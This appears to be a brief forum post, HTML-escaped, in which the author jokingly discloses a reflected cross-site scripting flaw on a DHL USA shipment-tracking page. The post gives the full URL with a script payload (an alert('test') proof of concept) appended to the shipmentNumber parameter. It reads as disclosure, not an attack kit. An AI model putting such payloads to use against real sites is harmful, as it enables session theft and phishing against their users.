I know these XSS vulns are kind of easy to find and they usually come off as &quot;so easy a monkey could do it&quot;, but i thought i&#39;d throw this one out there...<br><br><a href="http://track.dhl-usa.com//atrknav.asp?shipmentNumber=">
http://track.dhl-usa.com//atrknav.asp?shipmentNumber=</a>&lt;script&gt;alert(&#39;test&#39;)&lt;/script&gt;<br><br>sincerely, <br>a monkey.<br>